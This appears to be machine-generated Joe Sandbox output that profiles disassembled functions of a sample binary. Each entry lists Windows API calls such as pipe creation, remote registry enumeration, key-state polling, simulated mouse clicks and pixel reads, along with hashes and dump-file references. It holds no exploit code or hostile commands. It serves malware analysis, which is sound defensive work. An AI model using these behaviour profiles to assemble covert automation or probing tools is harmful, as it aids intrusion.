Opcode ID: 2a1b94d5e052818574756fd8e601ca524a2c063d80b700e7a58ce59190763bd2
Instruction ID: 12d664080131ff26604c6cbb02255dc16e2035d26260632f39155f4e79094cd2
Opcode Fuzzy Hash: 2a1b94d5e052818574756fd8e601ca524a2c063d80b700e7a58ce59190763bd2
Instruction Fuzzy Hash: 58218E71100225BBEF109F64EC80EBA37E9EB59324F104A69F9A893290D7719C519760

Function 00B06D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 00B06DBC
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B06DEF
GetStdHandle.KERNEL32(0000000C), ref: 00B06E01
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00B06E3B

Strings

nul, xrefs: 00B06E36

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: fc8abc43cbd4d8733ca018e850fef5ae1ac6dac8422d00112dd2e4aee093dc35
Instruction ID: bb3b1f79b2b2cf6d18c5b461da0a65c3dc03007cf824a96bf2efa63196fc485e
Opcode Fuzzy Hash: fc8abc43cbd4d8733ca018e850fef5ae1ac6dac8422d00112dd2e4aee093dc35
Instruction Fuzzy Hash: C721927460030AABDB309F29DC45A9A7FF4EF45720F2046A9FCA0D72D0DB7099618B50

Function 00B06E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00B06E89
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00B06EBB
GetStdHandle.KERNEL32(000000F6), ref: 00B06ECC
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00B06F06

Strings

nul, xrefs: 00B06F01

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 720d6af2376ebfabe4952fc35aacdd53d96dca1afb3e67ac092e01f538446538
Instruction ID: 3f9ea677d536ca8eb307ddc87befc94abd7beec7c649305875349f83c92c5dfb
Opcode Fuzzy Hash: 720d6af2376ebfabe4952fc35aacdd53d96dca1afb3e67ac092e01f538446538
Instruction Fuzzy Hash: 6F2174755003069BDB309F69DC44AAA7BF8EF55720F200AA9FCA1D72D0DB70A861CB60

Function 00B0AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B0AC54
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B0ACA8
__swprintf.LIBCMT ref: 00B0ACC1
SetErrorMode.KERNEL32(00000000,00000001,00000000,00B2F910), ref: 00B0ACFF

Strings

%lu, xrefs: 00B0ACBB

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 5cddfae0c5f7eee0780be0abaefc358d6d54741277b07331f7ac15a78297ff96
Instruction ID: e8c83ecbd1e895c7fe47dceb2d2d0c0b28aae9e5643055e9d8333c0b74b6950b
Opcode Fuzzy Hash: 5cddfae0c5f7eee0780be0abaefc358d6d54741277b07331f7ac15a78297ff96
Instruction Fuzzy Hash: C0214431A00109AFCB10DF65CE45DEF7BF8EF49715B0044A9F909AB251DB71EA41CB61

Function 00B01AE8 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 49COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 00B01B19

Strings

APPEND, xrefs: 00B01B52
KEYS, xrefs: 00B01B30
EXISTS, xrefs: 00B01B41
REMOVE, xrefs: 00B01B1F

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: BuffCharUpper
String ID: APPEND$EXISTS$KEYS$REMOVE
API String ID: 3964851224-769500911
Opcode ID: cff989ec9762affe79d62d63443affe28b4575d85318703c017706d395e63bdf
Instruction ID: a736fd2b72777be630a7da8ccab924b80ae293f2925c36145c9af51579858c68
Opcode Fuzzy Hash: cff989ec9762affe79d62d63443affe28b4575d85318703c017706d395e63bdf
Instruction Fuzzy Hash: 06113C319002098FCF04EFA8D9519AEB7F4FF26308B1048E9D82467291EB32590ACB50

Function 00B1EB55 Relevance: 7.7, APIs: 5, Instructions: 247COMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00B1EC07
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00B1EC37
GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00B1ED6A
CloseHandle.KERNEL32(?), ref: 00B1EDEB

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Process$CloseCountersHandleInfoMemoryOpen
String ID:
API String ID: 2364364464-0
Opcode ID: a76a2773e42aaf0f528acb927e3ae667e03872573180d35295272bafab9ea2f2
Instruction ID: 618b1561736578840e2cf27cf5efe0327666b93dc7bd1cc18c27122d798ad9f5
Opcode Fuzzy Hash: a76a2773e42aaf0f528acb927e3ae667e03872573180d35295272bafab9ea2f2
Instruction Fuzzy Hash: 7A816D716043009FD720EF28C986B6BB7E5EF49B10F44886DF9A99B2D2DB74EC418B51

Function 00B20037 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA7DE1: _memmove.LIBCMT ref: 00AA7E22

Part of subcall function 00B20E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00B1FDAD,?,?), ref: 00B20E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00B200FD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B2013C
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B20183
RegCloseKey.ADVAPI32(?,?), ref: 00B201AF
RegCloseKey.ADVAPI32(00000000), ref: 00B201BC

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
String ID:
API String ID: 3440857362-0
Opcode ID: c8f5662a02d98f7c80b9c891d6f793cb308625b241dea039554774c8b1005847
Instruction ID: 682cc979b06577f9301406aabc03cffd24439d79ad5b7e7fb1130656ba5b912b
Opcode Fuzzy Hash: c8f5662a02d98f7c80b9c891d6f793cb308625b241dea039554774c8b1005847
Instruction Fuzzy Hash: 46516831218204AFC714EF68DD81E6BB7E9FF84304F40496DF5999B2A2DB31E905CB52

Function 00B1D8C8 Relevance: 7.6, APIs: 5, Instructions: 139libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

LoadLibraryW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B1D927
GetProcAddress.KERNEL32(00000000,?), ref: 00B1D9AA
GetProcAddress.KERNEL32(00000000,00000000), ref: 00B1D9C6
GetProcAddress.KERNEL32(00000000,?), ref: 00B1DA07
FreeLibrary.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 00B1DA21

Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00B07896,?,?,00000000), ref: 00AA5A2C
Part of subcall function 00AA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00B07896,?,?,00000000,?,?), ref: 00AA5A50

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
String ID:
API String ID: 327935632-0
Opcode ID: 849396cc0074c366dd86d184a704d734180301dfadcd1cda4c46e253dfca7bc6
Instruction ID: ae31a2eb66a746a9856af452ca55887d96a229ef423a5c63b075d74e9981553e
Opcode Fuzzy Hash: 849396cc0074c366dd86d184a704d734180301dfadcd1cda4c46e253dfca7bc6
Instruction Fuzzy Hash: B2511635A00609DFCB00EFA8C5849EEB7F5FF09320B5481A5E955AB352DB31AD85CF91

Function 00B0E571 Relevance: 7.6, APIs: 5, Instructions: 135COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B0E61F
GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B0E648
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B0E687

Part of subcall function 00AA9837: __itow.LIBCMT ref: 00AA9862
Part of subcall function 00AA9837: __swprintf.LIBCMT ref: 00AA98AC

WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B0E6AC
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B0E6B4

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
String ID:
API String ID: 1389676194-0
Opcode ID: b0e83c4f2c745bd40369951886e37d8513823bfa32f652a1f48b7ef4b6227e34
Instruction ID: 121a68c72533a13e075bab8ca3457621b2b3ca8734805b7bb682e7dbaeec053c
Opcode Fuzzy Hash: b0e83c4f2c745bd40369951886e37d8513823bfa32f652a1f48b7ef4b6227e34
Instruction Fuzzy Hash: EE510A35A00105DFCB01EF64D981AAEBBF5EF0A314F1484A9F819AB3A1CB35ED11DB50

Function 00B2A056 Relevance: 7.6, APIs: 5, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4775669c3cbd6864d42648d3bd727fcc41ef73031d6acf63103fc6ff63ea1bdc
Instruction ID: e3f8dd4fbfe9881b851929dca00ac8d76621bf5d6d3ef2f1bfeb94c49289402e
Opcode Fuzzy Hash: 4775669c3cbd6864d42648d3bd727fcc41ef73031d6acf63103fc6ff63ea1bdc
Instruction Fuzzy Hash: 6A41EA35904124AFD720DF28EC85FAABBE4EB0A321F1405A5F91DB72E1CB70AD61DA51

Function 00AA2344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00AA2357
ScreenToClient.USER32(00B657B0,?), ref: 00AA2374
GetAsyncKeyState.USER32(00000001), ref: 00AA2399
GetAsyncKeyState.USER32(00000002), ref: 00AA23A7

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 9d1fe399aefde8bd9320361ada47ddfc1019028904899cc3a966ca9452c59cad
Instruction ID: ec5962f3e5e9dc2d4629d7025a6cc91fd7c6d3a2dc10f8a540eed0e414adc353
Opcode Fuzzy Hash: 9d1fe399aefde8bd9320361ada47ddfc1019028904899cc3a966ca9452c59cad
Instruction Fuzzy Hash: E5417335504116FBDF259F68C844BE9BBB5FB06360F204356F829972D0CB34A960DFA1

Function 00AF63AA Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON

Download Yara Rule

APIs

PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF63E7
TranslateAcceleratorW.USER32(?,?,?), ref: 00AF6433
TranslateMessage.USER32(?), ref: 00AF645C
DispatchMessageW.USER32(?), ref: 00AF6466
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AF6475

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Message$PeekTranslate$AcceleratorDispatch
String ID:
API String ID: 2108273632-0
Opcode ID: ed486e6e4c82c2697a42c0991915de50ae3ceb5dcf69b59211f948c024945bda
Instruction ID: 9adb05248a8ed0d49c5f1397a97596152be033ed1480a347dc302f63ca3fccb7
Opcode Fuzzy Hash: ed486e6e4c82c2697a42c0991915de50ae3ceb5dcf69b59211f948c024945bda
Instruction Fuzzy Hash: 8B31C27190064AAFDB35DFF0CD44BB6BBB8AB01301F140275F621C71A0EB699899EB60

Function 00AF8A1F Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00AF8A30
PostMessageW.USER32(?,00000201,00000001), ref: 00AF8ADA
Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00AF8AE2
PostMessageW.USER32(?,00000202,00000000), ref: 00AF8AF0
Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00AF8AF8

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessagePostSleep$RectWindow
String ID:
API String ID: 3382505437-0
Opcode ID: 2f2ac0ea102b2e6a9672da72d018e02cf990b2285c0e48c29be03e915a57c5a4
Instruction ID: f4eef4f08d6f1e518d5ac2601413c345c39497f2147a1a747ca7c0dd18cc8adb
Opcode Fuzzy Hash: 2f2ac0ea102b2e6a9672da72d018e02cf990b2285c0e48c29be03e915a57c5a4
Instruction Fuzzy Hash: 4231C07150021DEBDF14DFA8DD4DAAE3BB5EB04315F11822AFA25EB2D0CBB49914DB90

Function 00AFB1EC Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00AFB204
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00AFB221
SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00AFB259
CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00AFB27F
_wcsstr.LIBCMT ref: 00AFB289

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
String ID:
API String ID: 3902887630-0
Opcode ID: 41532f9761f693bcef37886982bf3b5af020274232adbdcac2f82e0408237e06
Instruction ID: 84b6596014b4a69d2cd618cf2fe48599a76a301fdd393fdd8cfd9c2f89ab7fc1
Opcode Fuzzy Hash: 41532f9761f693bcef37886982bf3b5af020274232adbdcac2f82e0408237e06
Instruction Fuzzy Hash: 0621D332214205AAEB255BB5DC09EBF7BBCDB49750F00813DF905DA1A1EF619C419260

Function 00B2B14B Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00AA2612: GetWindowLongW.USER32(?,000000EB), ref: 00AA2623

GetWindowLongW.USER32(?,000000F0), ref: 00B2B192
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B2B1B7
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B2B1CF
GetSystemMetrics.USER32(00000004), ref: 00B2B1F8
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00B10E90,00000000), ref: 00B2B216

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 5f822dcb0f51a938cdfd28b1aee163c9f2c9edb27dce902ae61cb7b1e1770b57
Instruction ID: 6993a0527add4ff7e335febccaafca33e4a61909e27893689ae71c407912f3e6
Opcode Fuzzy Hash: 5f822dcb0f51a938cdfd28b1aee163c9f2c9edb27dce902ae61cb7b1e1770b57
Instruction Fuzzy Hash: A3218071920262EFCB209F38AC54E6A3BE4EB15721F104778F93AD71E0DB3098219B90

Function 00AF9307 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00AF9320

Part of subcall function 00AA7BCC: _memmove.LIBCMT ref: 00AA7C06

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF9352
__itow.LIBCMT ref: 00AF936A
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00AF9392
__itow.LIBCMT ref: 00AF93A3

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: a9a6f4f3b9959492f603066c4bb45130975112ad1e7412bb7f5a7bbd3cfda6b5
Instruction ID: 8c9b96b8581f3c30e456ce306288492e032c51bfe889df004647fc2e58c2ea87
Opcode Fuzzy Hash: a9a6f4f3b9959492f603066c4bb45130975112ad1e7412bb7f5a7bbd3cfda6b5
Instruction Fuzzy Hash: 1221F53170020CABDB219BA49D85FFF3BB9EB49710F044029FA45DB1D1DAB0CD4597A1

Function 00B15A4D Relevance: 7.6, APIs: 5, Instructions: 70COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 00B15A6E
GetForegroundWindow.USER32 ref: 00B15A85
GetDC.USER32(00000000), ref: 00B15AC1
GetPixel.GDI32(00000000,?,00000003), ref: 00B15ACD
ReleaseDC.USER32(00000000,00000003), ref: 00B15B08

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354475168.0000000000B5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354498772.0000000000B67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_MBOaS3GRtF.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 09be97bfeeec02044ccf4d5ef7e58f27a1e7bbb9e16435eefeb6a64e3dc1b911
Instruction ID: de5fa816dccd7f089b8a16bd79d63221994e033f1bde367b98103e7398bc760e
Opcode Fuzzy Hash: 09be97bfeeec02044ccf4d5ef7e58f27a1e7bbb9e16435eefeb6a64e3dc1b911
Instruction Fuzzy Hash: 39218135A00104AFD724EF65DD84AAABBF9EF49351F5484B9F84997362CF30AD41CB90

Function 00AA12F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00AA134D
SelectObject.GDI32(?,00000000), ref: 00AA135C
BeginPath.GDI32(?), ref: 00AA1373
SelectObject.GDI32(?,00000000), ref: 00AA139C

Memory Dump Source

Source File: 00000000.00000002.1354306495.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.1354277680.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1354390308.0000000000B54000.00000002.00000001.01000000.00000003.sdmpDownload File
